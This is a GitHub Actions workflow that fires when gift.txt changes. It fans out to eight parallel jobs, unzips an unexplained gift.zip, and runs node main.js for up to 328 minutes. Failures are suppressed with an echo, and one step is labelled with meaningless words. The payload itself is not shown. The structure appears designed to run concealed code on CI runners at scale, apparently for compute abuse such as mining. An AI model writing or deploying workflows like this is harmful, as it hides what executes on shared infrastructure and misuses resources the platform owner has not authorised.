name: gift
on:
  push:
    branches: [ "main" ]
    paths:
      - "gift.txt"

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { os: 0 }
          - { os: 1 }
          - { os: 2 }
          - { os: 3 }
          - { os: 4 }
          - { os: 5 }
          - { os: 6 }
          - { os: 7 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20

      - name: Unzip gift.zip
        run: |
          sudo apt install -y unzip
          unzip gift.zip

      - name: because after even jealous mesh
        run: |
          npm install --ignore-scripts
          timeout 328m node main.js || echo "gift executed"